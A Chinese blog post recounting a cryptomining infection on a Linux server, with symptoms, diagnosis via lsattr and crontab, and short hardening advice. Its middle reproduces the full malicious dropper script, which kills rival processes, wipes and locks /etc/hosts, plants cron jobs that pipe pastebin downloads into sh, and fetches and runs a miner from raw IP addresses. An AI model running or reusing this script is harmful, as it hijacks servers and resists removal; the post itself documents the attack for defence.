记一次被挖矿经历

现象

1.本地/etc/hosts文件被清空,且无法编辑,导致域名无法解析
2.被添加定时任务,且无法删除
3.服务器运行的某些服务被杀掉
4.CPU拉满

异常分析

#1.特殊权限使用lsattr命令查看
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts
:~ # chattr -ai /etc/hosts	
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts	#感觉无法删除,但是实际上已经删除了,只不过病毒程序一直清空并添加特殊权限

#2.定时任务crontab
:~ # crontab -l
*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh
:~ # crontab -e		#无法编辑,因为这个文件一直被创建并且覆盖掉原来的文件

#3.服务器部署运行的大部分服务被杀掉,是因为这样病毒才能占用服务器大量的CPU去挖矿等,这是服务宕掉的原因,也是病毒窃取服务器CPU的方式

病毒脚本

#使用curl、wget命令可以加载病毒脚本

#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'echo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmp' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'urlopen' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'crun' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'x64b' | awk '{print $2}' | xargs -I % kill -9 %
ps -ef | grep /tmp/ | grep -v 'java\|redis\|mongod\|grep\|weblogic\|oracle\|solr'| cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep 'xmi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xms' | awk '{print $2}' | xargs -I % kill -9 %
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep network | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep crun | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "bwD1BCXt" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh"
  ) | crontab -
fi
rm -f /tmp/.solra
pkill oracle.tmp
chattr -isa /tmp/*
chmod +rw /tmp/*
rm -f /tmp/*
rm -f /var/tmp/*
pp=$(ps auxf|grep javae|awk '{if($3>=50.0) print $2}')
name=""$pp
if [ -z "$name" ]
then
    pkill weblogic.sh
    pkill javae
else
    rm -f /tmp/*
    exit 1
fi
s2=`whoami`
if [ `whoami` = "root" ];
then
    chattr -ia /etc/cron.d/*
    rm -rf /etc/cron.d/*
    chattr -i /var/spool/cron/crontabs/root
    chattr -i /usr/local/bin/dns
    rm -f /etc/cron.hourly/oanacroner
    rm -f /etc/cron.hourly/oanacrona
    rm -f /etc/cron.daily/oanacroner
    rm -f /etc/cron.daily/oanacrona
    rm -f /etc/cron.monthly/oanacroner
    rm -f /usr/local/bin/dns
    rm -f /etc/update.sh
    chattr -ia /etc/hosts
    echo >/etc/hosts
    chattr +ia /etc/hosts
    chattr -i /etc/sysupdate
    rm -f /etc/sysupdate
    rm -f /etc/config.json
    rm -f /var/tmp/kworkerds
    rm -f /usr/bin/.systemcero
    rm -f /usr/bin/cloudupdate
    rm -f /usr/bin/diskmanagerd
    rm -f /lib/libterminfo.so
    rm -f /bin/httpsntp
    rm -f /bin/ftpsntp
    rm -f /var/tmp/jspserv
    rm -f /usr/sbin/cron
    rm -f /usr/bin/kinsing*
    rm -f /etc/cron.d/kinsing*
    rm -f /usr/bin/node
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/crontab
    chattr +ia /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/cron.d/root
    chattr +ia /var/spool/cron/root
    chattr +ia /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
else
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|sbin\|WebLogic.sh\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|sbin\|WebLogic.sh\|server\|aux\|httpd\|sh\|sbin|' | grep $2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill node
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
pkill miner.sh
rm -rf /root/c3pool/*
rm -rf ~/c3pool/*
mkdir /tmp/dbusex
mkdir /var/tmp/dbusex
mkdir /var/tmp/go
mkdir /tmp/x86_64
mkdir /tmp/i686
mkdir /tmp/x86_643
mkdir /tmp/x64b
mkdir /tmp/go
mkdir /tmp/xmi
mkdir /tmp/zzz
mkdir /tmp/kingsing
pkill dbused
mkdir /var/tmp/kinsing
chmod -w /var/tmp/kinsing
mkdir /tmp/kdevtmpfsi
chmod -w /tmp/kdevtmpfsi
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    pkill solr.sh
    pkill solrd
    ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
    mkdir /tmp/.solr
    curl -fsSL http://136.243.19.213:8885/docs/config.json -o /tmp/.solr/config.json
    curl -fsSL http://222.122.47.27:2143/auth/java.exe -o /tmp/.solr/solrd
    curl -fsSL http://27.1.1.34:8080/docs/solr.sh -o /tmp/.solr/solr.sh
    chmod +x /tmp/.solr/solrd
    chmod +x /tmp/.solr/solr.sh
    nohup /tmp/.solr/solr.sh &>>/dev/null &
    sleep 10
    rm -f /tmp/.solr/solr.sh
else
    exit
fi

病毒内部代码逻辑参考

解决方法

#kill掉病毒程序的主进程

病毒攻击方式分析

1.系统漏洞
2.常用服务、自开发服务的漏洞
3.端口漏洞
4.弱密码漏洞

系统优化

#1.更新系统补丁
#2.修改redis等服务的绑定地址,限定可以连接Redis服务器的IP
#3.修改常用服务的端口
#4.修改服务器、服务的密码
#5.优化ssh服务,删除 ~/ssh/authorized_keys 下的陌生公钥
#6.在路由器上封禁IP或IP段
posted @ 2021-03-18 10:52  看萝卜在飘  阅读(342)  评论(0编辑  收藏  举报